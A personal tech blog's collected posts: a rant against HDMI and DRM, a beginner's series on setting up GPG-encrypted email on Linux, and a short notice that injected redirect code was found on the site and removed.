Jeff Hendricks (.net)

You’ve all heard the buzzwords. High-Def, 1080p, HDMI, Blu-Ray. The list goes on and on. It’s all garbage, nothing more than marketing hype to make you buy into the “magic pill” the entertainment industry is selling you.

“You’re off your rocker, old man,” you say. I can see you rolling your eyes, shaking your head at my old-school stupidity. “Everybody knows HDMI is cool. It’s a one-wire hookup, gives unequalled definition, is the only format that does 1080p, ends world hunger, etc.”

Sadly, all off the reasons in that last sentence are false, except for one. HDMI is truly a 1-wire hookup. Other than that, it provides absolutely no advantages over technology that we already have for end-users.  NONE.

“But what about 1080p video?” Guess what? It’s been available in studio-quality component video decks for years. 3-wire component video will easily output 1080p video and higher, with one very important thing missing: the digital copyright protection. This is why even if you buy an HD disk player, it won’t output HD content to the component outputs. That’s why the Playstation 2 and XBox360 won’t play HD video over component… you can only play games in HD unless you use the HDMI connector because analog outputs don’t support Copyright protection (which will become required in 2012).

“What about digital signal quality? Isn’t HDMI better because it’s digital?” In a word, no. You’re limited to very short cable runs, zero fault tolerance, higher cost, and at a true 1080 resolution, you’d have a hard time telling the difference visually. It’s all hype. And as far as sound goes, the digital format is already covered. And what’s more, 90% of the content that is advertised as “1080p” isn’t really, it’s upscaled, interpolated, or antialiased from lower content… but you can only tell the difference when comparing it to true HD 1080p 60hz content, like Discovery’s Planet Earth series which was shot in all 1080p 60 hz.

“Isn’t DRM (Digital Rights Management) good? Isn’t it protecting companies from piracy?” In a word, no. They’d like you to believe “big bad pirates” are stealing all their money. The truth is, DRM has never been about piracy. Over the years many companies have tried to limit the way paying customers use the media they “buy.” Bet you didn’t know this, but 99% of DVD’s sold in stores still, to this day, are encrypted so you can’t play them on an unlicensed device. And they only sell licenses to companies they want to. The only way I can play them on a Linux computer is if I install “legally questionable” CSS decryption software… even though I paid for the DVD. I’m also supposed to buy a CSS DVD player to watch them.

“No big deal,” you might think. “What’s wrong with having to buy a Blu-ray player to watch Blu-rays?” The problem is that it doesn’t stop there. The entertainment industry isn’t interested in stopping piracy, for the most part… they want to control your movie watching experience, from beginning to end, they way they want you to. You want to use a sound clip from a movie you bought to use as a ringtone? Can’t do that. Want to load the movie onto your iPhone to watch? Can’t do that. Want to skip the stupid previews on the disk? Nuh-uh. Want to watch it on a different TV/console in your house, from a media server, at full resolution? Absolutely no way, man. Got an older HD TV that will do 1080 but has no HDMI port? You’re out of luck, chump. Got a computer monitor you want to watch 1080 video on? Has to have special hardware and software to do it with. If you have a digital HD DVR, you better be taking notes… this will affect you in the future.

Do you know why they’re phasing out analog TV, cable, and analog video outputs in general? It’s called “the analog loophole” by the industry, and they hate it. They’re not interested in “giving you the best experience.” For them, DRM is about two things: CONTROL. and MONEY. They are terrified of digital DVRs, and will do whatever they can to lock down that content, in order to be able to charge you for watching it at your leisure. If they can force you to pay to watch what you want, on top of the charge you’re already paying to see it, they love it. They already have rental movies that “expire” and they are going to try to make cable, satellite, and HD disks the same way.

“Aren’t you just being cheap? What’s wrong with just buying a new entertainment system?” This is where I slap my forehead and roll my eyes at you.

I shouldn’t have to buy thousands of dollars of equipment to watch high-def video. If I want to, that’s fine… but it should not be required, when the technology is already cheaply available. You are not paying for HD content… you are playing for the enormous cost of upgrading your entire entertainment center just so it supports the industry’s anti-freedom policies. In the next few months, it will be illegal to build or buy AV equipment that doesn’t support the AACP standards. In the next year or two, it will be illegal to broadcast non-digital content over the airwaves. And in 99% of the TVs you buy today, you’re not getting true 1080p video to it, anyway… it’s limited by the source.

I’m going to fight it as long as I can. I see no need to dole out thousands of dollars just so I can enjoy a movie when I want to watch it. Call me a luddite, call me a retro freak, I don’t care… I don’t like people telling me how I can enjoy my entertainment.

At this point, if you’ve read through the Encryption article series, you’ve got a pretty good idea of what encryption does, and how it works. So what else is there left to cover? This is the “Skip to the end” part of the series… I’m just going to show you step-by-step how to set up usable GPG encrypted mail in Linux. No fuss, no hassle.

You only need two programs to do this, but a third (key manager) will make it easier.

First: install GPG for your distro of Linux. If you’re running Ubuntu or Debian, then

sudo apt-get install gpg

But whatever you use to manage software for your system, you should be able to find “GPG” and install what it needs.

Second, you need to create a new key pair (public and private). Make sure you use an email address that will not disappear in a year or two! This email address is your key’s form of identification.

gpg –gen-key

This will start the key generation process. Just follow the instructions, the defaults will work fine. Come up with a fairly long password… and DO NOT forget it!

Third, install some sort of email client with GPG plugin support. I use Mozilla Thunderbird with the Enigmail add-on. I also use a program called Kgpg to manage my keys. It runs in the tray and lets me encrypt/decrypt things on the clipboard. Not necessary, just makes things much easier.

Once you’ve installed your mail client, it should automatically pick up your GPG key (it’s set to import your local GPG keys automatically) and you can then either send your public key to your friends, post it to your website, or even upload it to a key server. Most key management programs have a feature that lets you upload your public key to an internet keyserver.

And that’s it. You’re done! When you send mail, just use the OpenGPG menu to find the recipient’s email address, and if they have one on a keyserver, it will automatically retrieve their public key and encrypt the message to them. Likewise, it will automatically decrypt messages sent to you if you want.

Easy cheesy!

Thankfully it wasn’t anything serious. I can manage to find a few bits of stealthed code, it’s been taken care of.

How did this happen? Let’s look at the attacker’s IP address (since everything that hits the site is logged). I do a “whois” search on the IP address, and find that it’s assigned to a company in California, that uses Bluecoat web proxy filtering. Ding ding ding, there’s the problem right there.

Most likely what happened is that someone found a weakness in one of their proxy servers (which are notorious for having weaknesses) and used it as a portal to launch an attack on my website, which was to add a few lines of hidden code where I wouldn’t notice it, but would cause redirects to sites with ads for that person’s personal benefit. Chances are if they had done something drastic, I would have noticed earlier.

This is a perfect example of why people need to learn more about security… I will be upgrading my WordPress engine shortly. Again, sorry if you got redirected, and God help whoever hacked it if I ever find out who it was (not likely).

I’m sorry. I just figured out something got added to my website’s code without my knowledge that causes anyone loading my blog to get redirected to sites I don’t link to.

How is that possible? Well, there’s a few ways it could happen. Either someone hacked my WordPress account, or the code was there in the theme and I didn’t catch it, or there’s an exploit in this version of WordPress they used to modify files.

I’m guessing nobody actually hacked my account, but I’ll change passwords just to make sure. My guess is that the unescape code (a trick where they use a javascipt function to ascii encode and hide stuff) was already there in the theme, and I just didn’t catch it. Regardless, if you got redirected, I apologize. The code has been removed, and if it pops up again, I will know it wasn’t me that put it there.

In the last few articles on GPG encryption, we talked about software, and generating a private key. Now we come to the part where we put out our public key which will let others send us encrypted messages, and get other people’s public keys which let us send messages to them.

Ideally, you would personally give your public key to a friend, and they would give you theirs. You would know 100% it came from them. However, sometimes you want to send things to people you can’t meet, and it’s also possible for someone to falsify an encryption key with someone else’s email address… which would let them read it if they had the matching private key.

This introduces something called trust. Let’s say my friend sends me his public key. I trust him, I know his key is correct, and I trust it’s secure. I can then sign his key and verify it’s secure. I can also assign it a level of trust that tells me how much I can rely on it.

Normally, you’re going to only mess with keys from people you know. However, an interesting feature of GPG encryption is that you can encrypt a message or file to more than one person at a time! If you specify more than one public key to encrypt it, then any one of those keys can decrypt the message. This is why it’s important to verify trust! You may know person “A” very well, but unless you know every single person you’re encrypting to, there’s potential for hacking or foul play. You can read up more on trust at GPG’s website. It’s worth a read, but it’s beyond the scope of this article.

There is also a way to verify a key without meeting the person directly: each key has what’s called a fingerprint. This is a string of letters that lets you verify the key is from who they say it is. You can contact the actual person by phone, chat, etc. and if the string they read off matches their key’s fingerprint, then you know it’s from them. You can then sign it to verify it’s trusted. Click here to read more.. »

This is kind of an extension on part 3 of my articles on GPG encryption. I talked very little about front-ends for GPG, so I’ll give you a quick simple (and free) way to use GPG for basic email encryption and signing.

Since I’m using Ubuntu Linux, I have a few options as to what program I’m going to use for sending and receiving mail. I’ve decided to use Mozilla Thunderbird, which is a free, fairly basic email/RSS program. However, what I’m really interested in is an add-on for it called Enigmail which integrates GPG security when you send/receive emails.

With Thunderbird, you set up your email accounts like normal. Thunderbird supports several mail server types, so it will work fine for most people. If you need support for Exchange mail servers, you can look into a mail client called Evolution for Linux.

Click here to read more.. »

Once we’ve installed GPG and some sort of frontend, we need to create a private key to decrypt messages people send to us. Since there are too many frontends to go through them all, we’re going to cover the basics and creating a key pair with the GPG command line.

There is actually more than one kind of encryption, but what most people will want to use (for emails) is called a public-key cipher  which means you give people your public key, and you have a secret, private key that decrypts it. To keep your data secure, keeping your private key safe is critical! If a hacker gets hold of it, they can brute force the password and unlock all of your data… so don’t keep it on a computer that’s open to attack!

GPG keys use email addresses as identifiers, and you can add more than one subkey… which means you can add multiple addresses, or even a small photo for ID purposes. For most purposes, we will generate a key that is 1024 bits long, which is a good balance of security and speed of decryption. With modern computers, it may be possible to use keys larger than 1024 bits without slowdown during decryption, but 1024 is still a good starting point.

Your key also has an expiration date if you choose it. That means it is only good for a certain time, after which it won’t decrypt anything, even if someone knows the password.

So are you ready to generate a keypair? Here we go!

Click here to read more.. »

Once we have a need for encryption, the next question is “What do I need to use it?” The answer, of course, is a program that is made for encrypting things. There are very few places you can get encryption software, but when talking about key encryption, two names immediately come to mind: PGP and GPG (no, that’s not a typo).

PGP stands for “Pretty Good Protection” and is a private company. They offer more than just simple key encryption software. They have tools that let you encrypt an entire hard drive, and still use it normally. Without the key, nobody can see what’s on it once it’s shut off. Their basic software used to be free, but it is now non-free… which rules it out, in my book. Unless you need their specific server software (which isn’t the goal of this series of articles) and are willing to dole out money, let’s look at our other option.

Click here to read more.. »

Some of you may have heard of computer encryption, and never thought about it. What exactly is encryption?

In cryptography, encryption is the process of transforming information (referred to as plaintext) using an algorithm (called cipher) to make it unreadable to anyone except those possessing special knowledge, usually referred to as a key. The result of the process is encrypted information.

So what does that mean for you and me? Well, with encryption, it becomes possible to “scramble” information so that only the people you specify can decrypt and read it. It’s very likely that you already use this technology without even knowing it. If you use a secure socket layer (SSL) connection to a website, that uses encryption. That way the data can only be understood by the computer on the other end, and any virtual wiretappers can’t make sense of it. It’s very likely that your wi-fi internet connection uses encryption, too (and if not, should!)

Most people think they will never need personal encryption, but it can be used for more than just scrambling data. You can digitally sign something to prove that you wrote it, or that it came directly from you. It is like a digital fingerprint, and only you can possess it.

In its very most basic form, it is an equation. An encryption key is made of two parts: the public key and the private key. Let’s say you want to send a message to somebody, and you only wanted them to be able to read it. You have that person’s public key, which lets you scramble the message, and only someone with that exact matching private key can unscramble it.

So let’s break this down into sections:

1. Introduction
2. Getting the software
3. Setting up your personal public/private keys
4. Getting public keys of friends you trust
5. Encrypting data

I’ll walk you through each of these steps, and when finished, you’ll be able to send and receive encrypted messages and data to and from someone else that uses encryption. Stay tuned for part 2: Software!

Have you ever been frustrated with Microsoft Windows always giving you problems, but couldn’t justify the money to buy a Mac?

I feel your pain! As a technician in the I.T. industry for the last 12 years, I’ve seen more problems with Windows than I care to remember. Viruses, spyware, malware, driver instability, performance issues, incompatibilities, crashes, forced upgrades, and inflexible liscencing schemes…

Click here to read more.. »